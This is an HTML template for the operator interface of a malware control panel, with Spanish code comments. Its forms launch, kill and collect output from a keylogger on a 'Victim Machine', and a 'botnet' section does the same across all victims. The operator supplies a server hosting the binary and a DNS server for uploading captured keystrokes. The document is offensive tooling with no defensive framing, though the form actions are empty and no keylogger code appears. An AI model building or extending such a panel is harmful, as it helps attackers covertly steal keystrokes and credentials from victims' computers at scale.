<app-menu></app-menu>
<h2>EXECUTE KEYLOGGER ON VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to launch a keylogger on Victim Machine.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Launch Keylog" />
</form>

<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Kill keylogger on Victim Machine.</p>
  <input type="submit" value="Kill Keylogger" />
</form>

<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter the parameters to get "MicrosoftKlgden" file with keystrokes captured from Victim Machine.</p>
  <p>IP Server to upload the file("http://localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>EXECUTE KEYLOGGER ON VICTIM MACHINES - BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to launch a keylogger in all Victim Machines.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Launch Keylog" />
</form>

<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Kill keylogger on Victim Machine.</p>
  <input type="submit" value="Kill Keylogger" />
</form>

<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter the parameters to get "MicrosoftKlgden" file with keystrokes captured from Victim Machine.</p>
  <p>IP Server to upload the file("http://localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
